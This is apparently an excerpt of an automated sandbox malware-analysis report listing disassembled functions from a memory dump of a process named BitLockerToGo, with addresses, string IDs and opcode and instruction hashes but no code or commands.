                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r9D
                                                                                                                  • API String ID: 0-3607194911
                                                                                                                  • Opcode ID: c84ddf3c5aed4553c1bab30dfe0482e231e9afb7ee3fb00aff104731666b7ddd
                                                                                                                  • Instruction ID: 9e644749bf5f4ac26fb451a7f6ca8b4df0148cbf3ad30d1da0620de817d41bc5
                                                                                                                  • Opcode Fuzzy Hash: c84ddf3c5aed4553c1bab30dfe0482e231e9afb7ee3fb00aff104731666b7ddd
                                                                                                                  • Instruction Fuzzy Hash: FC91263A608711CFC708CF68E8A025AB7E2FB89356F19867DC492873B2D735E915CB45
                                                                                                                  Function 00446600 Relevance: 1.5, Strings: 1, Instructions: 295COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: KJML
                                                                                                                  • API String ID: 2994545307-719402181
                                                                                                                  • Opcode ID: 4666cf362039bda6fd0d9e52c0773eb325d10ddb719923c5c2b34068e6a53d70
                                                                                                                  • Instruction ID: f0ea8b825e187c736050e1a7f5bbd9d6d03ba75e33f631e7d954761d691cf5eb
                                                                                                                  • Opcode Fuzzy Hash: 4666cf362039bda6fd0d9e52c0773eb325d10ddb719923c5c2b34068e6a53d70
                                                                                                                  • Instruction Fuzzy Hash: AD910535A093218BDB24DF18C49062FB3F2BF9A750F06852DE98597361DB35EC51C78A
                                                                                                                  Function 00446310 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: KJML
                                                                                                                  • API String ID: 2994545307-719402181
                                                                                                                  • Opcode ID: 253b1917f704b2bb99eb7cd5e1d7390558155b563d0c5b59d9d502a79d310d87
                                                                                                                  • Instruction ID: 23854276df50cd86395bcfc0d1f9eb862f18c8b2906c1a907dd3d154db63451f
                                                                                                                  • Opcode Fuzzy Hash: 253b1917f704b2bb99eb7cd5e1d7390558155b563d0c5b59d9d502a79d310d87
                                                                                                                  • Instruction Fuzzy Hash: C681F2356043019BEB15DF18D890A2BB3E2FF9A750F06852EE9858B365EB35DC11CB4A
                                                                                                                  Function 0040A4F0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ,
                                                                                                                  • API String ID: 0-3772416878
                                                                                                                  • Opcode ID: 3aadb8d6e2eb8ed99b60e1f8694ff8ba9c936bfd9ccd258277aec8a2b2734918
                                                                                                                  • Instruction ID: d213d925d07f7b156e65934c03d8bd83a5a20f685b4e69840fdb4bcbc7e21a76
                                                                                                                  • Opcode Fuzzy Hash: 3aadb8d6e2eb8ed99b60e1f8694ff8ba9c936bfd9ccd258277aec8a2b2734918
                                                                                                                  • Instruction Fuzzy Hash: 6AB13A711083819FD325DF28C88061BFBE0AFA9704F448E2DE5D997782D635E918CBA7
                                                                                                                  Function 00434F40 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: w
                                                                                                                  • API String ID: 0-476252946
                                                                                                                  • Opcode ID: 1e38be19174eb8b79de54e21ae162b5f6707554abf5c75375c4ba1d81d788580
                                                                                                                  • Instruction ID: a4994fcbf7e419445189b8c4c728530524f498fa0232e23afb5d451a32db018c
                                                                                                                  • Opcode Fuzzy Hash: 1e38be19174eb8b79de54e21ae162b5f6707554abf5c75375c4ba1d81d788580
                                                                                                                  • Instruction Fuzzy Hash: D5713927A4DAD147D728553C5C213BAAA920BDB334F3DD76FD8F14B3D1D55A8802838A
                                                                                                                  Function 0043C800 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: c!"
                                                                                                                  • API String ID: 0-3171637133
                                                                                                                  • Opcode ID: 0702966882714f572a4f68ace640448fb69636e1d36ceb3e624fe041d6333f8d
                                                                                                                  • Instruction ID: 5062258d9db3a34816592f6175359dc98aa8d973abd5ea2540549233ef5e8ce5
                                                                                                                  • Opcode Fuzzy Hash: 0702966882714f572a4f68ace640448fb69636e1d36ceb3e624fe041d6333f8d
                                                                                                                  • Instruction Fuzzy Hash: 50614271A08301ABD700DF64D881B6B77E2FBC8305F05983DF68997292D379E905C796
                                                                                                                  Function 0043FEC0 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-3019521637
                                                                                                                  • Opcode ID: 9f63ed7d07309489c4183c9e8cf942f34590ebd69d0a26a39783e31d5b555402
                                                                                                                  • Instruction ID: 4d55a5ae27a3ca9ec7b1294e76e542954caff4989d2e365f1c5445cde3ce7fc6
                                                                                                                  • Opcode Fuzzy Hash: 9f63ed7d07309489c4183c9e8cf942f34590ebd69d0a26a39783e31d5b555402
                                                                                                                  • Instruction Fuzzy Hash: 8E514C31E093104BEB115E7898803A7B3A5EB8A324F195A3FD99497366D37ADC12C7C9
                                                                                                                  Function 0042BE90 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: PS
                                                                                                                  • API String ID: 0-151015397
                                                                                                                  • Opcode ID: c04f124c9e929226a57e4175ea247ae1ab953e13aff295c5f2faf06801b7bee2
                                                                                                                  • Instruction ID: 555264a93d51d2416f2d24cf84280279240e93e8bccd0f0ed4e2b4b35550d84f
                                                                                                                  • Opcode Fuzzy Hash: c04f124c9e929226a57e4175ea247ae1ab953e13aff295c5f2faf06801b7bee2
                                                                                                                  • Instruction Fuzzy Hash: EB61BBB06083808BD7149F24949066FBBF2EF96358F945A6CE0D68B351E3788549CB87
                                                                                                                  Function 004402C0 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 0-4108050209
                                                                                                                  • Opcode ID: b9730d3210c89d47bb98c7957409f1a89f978c194504b4030e69099f46954d6e
                                                                                                                  • Instruction ID: 60b13ce5218250215142284efb923aea0821d6e460f21144138450980d483862
                                                                                                                  • Opcode Fuzzy Hash: b9730d3210c89d47bb98c7957409f1a89f978c194504b4030e69099f46954d6e
                                                                                                                  • Instruction Fuzzy Hash: 56718AB46083008FE714CF19D85176BBBF5FB89314F14891EEA958B390C37AE855CB96
                                                                                                                  Function 0040DF6A Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 39>?
                                                                                                                  • API String ID: 0-532897804
                                                                                                                  • Opcode ID: 4c5262abab938f83ebd32f14e8e7852a93c2daa262ab7c48957f72d3770b8c62
                                                                                                                  • Instruction ID: f725c4d04822e1715baec73c161c3ddd210037bcfca35b003f4d3afaf64405d2
                                                                                                                  • Opcode Fuzzy Hash: 4c5262abab938f83ebd32f14e8e7852a93c2daa262ab7c48957f72d3770b8c62
                                                                                                                  • Instruction Fuzzy Hash: 09514A76E583504FD308CF35EC9132BBEE2ABE9315F18893DE4C593392D63889058B86
                                                                                                                  Function 0043FB50 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-3019521637
                                                                                                                  • Opcode ID: 12d2d2231d14dfd7e357869e1d26870c7dcffc96ab67fa2b16c37d7a53a4cf22
                                                                                                                  • Instruction ID: 3a67e429ef3715ec7c6b5055b86593f1987a63fa3e3577edb97b3380bfcdcf10
                                                                                                                  • Opcode Fuzzy Hash: 12d2d2231d14dfd7e357869e1d26870c7dcffc96ab67fa2b16c37d7a53a4cf22
                                                                                                                  • Instruction Fuzzy Hash: 7B415A75E043045FDB109F25D850B27F3E2FB89764F29A53EE985573A2D234EC058789
                                                                                                                  Function 004201B0 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 0-3019521637
                                                                                                                  • Opcode ID: f2482d6fbc69220c323b25f10646720930b250288ca6362d4fcf87e7e5e3193a
                                                                                                                  • Instruction ID: a96344c3989b27c1c65bf269333b9680842f2c0a63251c9e60fff348f52383dd
                                                                                                                  • Opcode Fuzzy Hash: f2482d6fbc69220c323b25f10646720930b250288ca6362d4fcf87e7e5e3193a
                                                                                                                  • Instruction Fuzzy Hash: E541B0707083518BDB18CF58A4D162BB7E2BBC5354F64896EE48127A67C375CC42CB4A
                                                                                                                  Function 00442C56 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: 0c9e78e58cd1e67deacb44b3084c6d59b3346623e17f412f5094e70f0311c60b
                                                                                                                  • Instruction ID: 3ddd708af994ae801c711d03a4c79773daf9159475c7578897a388479b47a054
                                                                                                                  • Opcode Fuzzy Hash: 0c9e78e58cd1e67deacb44b3084c6d59b3346623e17f412f5094e70f0311c60b
                                                                                                                  • Instruction Fuzzy Hash: 9041BC702183418BE7148F29C99136BB7F0FF9A318F541A2EE4C6A7391D7788906CB1A
                                                                                                                  Function 00413AD0 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ?4
                                                                                                                  • API String ID: 0-2741434384
                                                                                                                  • Opcode ID: 1b18535d89bad497ce9f2cd2aa4db43e7aa12deb3a91030cb654b5e583b426a2
                                                                                                                  • Instruction ID: 85ab30a49117f2803c6af03dee967b6d7f0ee3b41b21b380993eec4a47a4db42
                                                                                                                  • Opcode Fuzzy Hash: 1b18535d89bad497ce9f2cd2aa4db43e7aa12deb3a91030cb654b5e583b426a2
                                                                                                                  • Instruction Fuzzy Hash: 66512B75B04B408FC315DE39C8953A6BBD3ABDA314F18897DD4EA8B382D639A5068701
                                                                                                                  Function 00440530 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: uxVd
                                                                                                                  • API String ID: 0-2172250569
                                                                                                                  • Opcode ID: 41a638c9d614a13b242d085b1d349e199f5cc5a5be1869bd2885ee0cb28aca49
                                                                                                                  • Instruction ID: 5a69f7641bfe0676a185e2a9ee14978a9a613b64c3d79931f7d1f3bde00317d9
                                                                                                                  • Opcode Fuzzy Hash: 41a638c9d614a13b242d085b1d349e199f5cc5a5be1869bd2885ee0cb28aca49
                                                                                                                  • Instruction Fuzzy Hash: 97311231604200ABEF21CF24DC81B6B77A6EB99350F14492EEA9683361D339DD30DF5A
                                                                                                                  Function 00418D10 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +
                                                                                                                  • API String ID: 0-2126386893
                                                                                                                  • Opcode ID: c0bab175173349b991536f260e003663497b5d60f15e71dbb93e9be93f1970c2
                                                                                                                  • Instruction ID: e2e61b5d000161fa634e7ae119b08431efe1e7afd56c75d32e6f44432bca0ed1
                                                                                                                  • Opcode Fuzzy Hash: c0bab175173349b991536f260e003663497b5d60f15e71dbb93e9be93f1970c2
                                                                                                                  • Instruction Fuzzy Hash: 9C412A72714B018FD328CF39C891797BBD3AB99314F198A2ED5A7C73D2DA78A8418705
                                                                                                                  Function 00414959 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +
                                                                                                                  • API String ID: 0-2126386893
                                                                                                                  • Opcode ID: 3579074ca631a6b731198df854b01d176a75bf616f5ab20c95fb4536e53b1f3a
                                                                                                                  • Instruction ID: 167550e9fd5c2dd9b343182c6f01c802a0141f53d8b972440fee1c2c67b68b45
                                                                                                                  • Opcode Fuzzy Hash: 3579074ca631a6b731198df854b01d176a75bf616f5ab20c95fb4536e53b1f3a
                                                                                                                  • Instruction Fuzzy Hash: 94411972755B018BD328CE38C991767BBD3AFD4314F19862EC4AB873D1CB78A8418B09
                                                                                                                  Function 00413896 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +
                                                                                                                  • API String ID: 0-2126386893
                                                                                                                  • Opcode ID: 27a417c3ecc82f528b377cbc834fc55934c6b65df83d63f1f7c2a188b87412b8
                                                                                                                  • Instruction ID: c99e24e179150d6d0090667cc7a3616c2de3b874143f0c313d16bc0183971b59
                                                                                                                  • Opcode Fuzzy Hash: 27a417c3ecc82f528b377cbc834fc55934c6b65df83d63f1f7c2a188b87412b8
                                                                                                                  • Instruction Fuzzy Hash: 65412AB2625B008BD328CE39C9D1357BBD2AB85320F1D8A2ED5EB873D1D678A5418705
                                                                                                                  Function 0042D676 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-3019521637
                                                                                                                  • Opcode ID: f59b2e17fc63073367a5c8e1ce6f6df254c007c9ed79d9a3389be7ebf24b6f82
                                                                                                                  • Instruction ID: 86a3beb0298e3e90437f5fb7a7b5769361899bae27c2e3d641cf83b2fd5a0b2b
                                                                                                                  • Opcode Fuzzy Hash: f59b2e17fc63073367a5c8e1ce6f6df254c007c9ed79d9a3389be7ebf24b6f82
                                                                                                                  • Instruction Fuzzy Hash: FA215C75F593219BD71C8F84A9E063B7752BBA5340F68952ED54263725C26DCC00C7CD
                                                                                                                  Function 0040BB20 Relevance: .8, Instructions: 831COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f919fd25b68f8b23c47560fb3d0dbc5215077b09a4e34c6ed2e6e280f62532f7
                                                                                                                  • Instruction ID: 7354772cdba3a3d4b9d7bf619985a2b75c34df106eee684cdd04a49f43505185
                                                                                                                  • Opcode Fuzzy Hash: f919fd25b68f8b23c47560fb3d0dbc5215077b09a4e34c6ed2e6e280f62532f7
                                                                                                                  • Instruction Fuzzy Hash: A652A131508315CBC724DF59E8C02AAB3E1FFD4314F258A3ED985A7391E739A855CB8A
                                                                                                                  Function 00406DA0 Relevance: .7, Instructions: 671COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5869a3bac998a2a4deb05598963a1a3e3d2f6ed1da0d4b741c4235c4f5e896bf
                                                                                                                  • Instruction ID: 5aae4baba2ae82c168d3e45b2b67fdeeb5f406ffc2d1550fac66fec47c16543e
                                                                                                                  • Opcode Fuzzy Hash: 5869a3bac998a2a4deb05598963a1a3e3d2f6ed1da0d4b741c4235c4f5e896bf
                                                                                                                  • Instruction Fuzzy Hash: AE52C53190C3458FCB14CF24C0906AABBE1BF85314F198A7EEC9A67381D779E945CB86
                                                                                                                  Function 0040B010 Relevance: .7, Instructions: 670COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 342fc66dd8bc67b6b21b86aaf34a35ff6cabb949c7e91262b628541523571fe7
                                                                                                                  • Instruction ID: 55a6a7136fc07514cabf04f5cbe0a7614fbdcadfd17dc8c6685a95c4fd93fa01
                                                                                                                  • Opcode Fuzzy Hash: 342fc66dd8bc67b6b21b86aaf34a35ff6cabb949c7e91262b628541523571fe7
                                                                                                                  • Instruction Fuzzy Hash: DA52A5B0908B848FE7358B24C4847A7BBE1EB51314F14497EC5E616BC2C37DA985C79E
                                                                                                                  Function 004077C0 Relevance: .6, Instructions: 607COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5f21029c0431dbbe7ae99125a22a9905dd7a7f46cf9306c0e6bda1421ba71e13
                                                                                                                  • Instruction ID: f02ad8145d6ab3b026d2ada7f685da6314f3d18191cd1d5ac018b044ba5a92b4
                                                                                                                  • Opcode Fuzzy Hash: 5f21029c0431dbbe7ae99125a22a9905dd7a7f46cf9306c0e6bda1421ba71e13
                                                                                                                  • Instruction Fuzzy Hash: 99423570A19B108FC378CF29C69052ABBF1BF45310B604A2ED69797B90D73AF845CB19
                                                                                                                  Function 0042DAC2 Relevance: .6, Instructions: 554COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bb5912e1f51cb29cc04f5c56cc383f32e252757f3fd574391a0a8b1cf03ec838
                                                                                                                  • Instruction ID: 86ac50148261bfc43ec58cc6550a12ae7257d50d01817b403fd4c0c7eb2a9c7f
                                                                                                                  • Opcode Fuzzy Hash: bb5912e1f51cb29cc04f5c56cc383f32e252757f3fd574391a0a8b1cf03ec838
                                                                                                                  • Instruction Fuzzy Hash: 0B0222B1E002609FDB19CF68C89166EBBB1EB45314F59866DD851AF386DB38D802CBD1
                                                                                                                  Function 00429B31 Relevance: .5, Instructions: 466COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2c54fafd451140cc4990c6b6710070a4476dc6fc9127795c5e7c058643264388
                                                                                                                  • Instruction ID: dc36626acd8ea7a66e684710d0aa7d6ccd9ba8ef28d1970958216295f1ac522b
                                                                                                                  • Opcode Fuzzy Hash: 2c54fafd451140cc4990c6b6710070a4476dc6fc9127795c5e7c058643264388
                                                                                                                  • Instruction Fuzzy Hash: C9F1E176E10225CBCB24CFA8C8916AFB7B1FF49304F6A8499C841AF365D7399D41CB94
                                                                                                                  Function 00409F80 Relevance: .5, Instructions: 451COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4901efd39e51beb97ba63e7c0cae8db30af674c8cda56c0dda0b09604dd036cb
                                                                                                                  • Instruction ID: d09dc4a866d54bdd7ce054dca5e9a6b3b735073b7f3b607b11ebbd9c79bb8c11
                                                                                                                  • Opcode Fuzzy Hash: 4901efd39e51beb97ba63e7c0cae8db30af674c8cda56c0dda0b09604dd036cb
                                                                                                                  • Instruction Fuzzy Hash: AEF1B1356083418FC714CF28C48062BFBE1FF99304F098A6EE9989B392D279D955CB97
                                                                                                                  Function 0041E330 Relevance: .4, Instructions: 431COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b8780fcc3a75506ddca264744ec66ada65feb4a1f74c8460df7091d5a00fdad1
                                                                                                                  • Instruction ID: acb73ee3776b176170991a6dd0436ef8427fca2b1b90999833293bf9a3ce38ec
                                                                                                                  • Opcode Fuzzy Hash: b8780fcc3a75506ddca264744ec66ada65feb4a1f74c8460df7091d5a00fdad1
                                                                                                                  • Instruction Fuzzy Hash: 989175B9900214DBDB20AF19DC927B773A1EF95314F09492EEC8687391F7399D81C78A
                                                                                                                  Function 004165C2 Relevance: .4, Instructions: 376COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
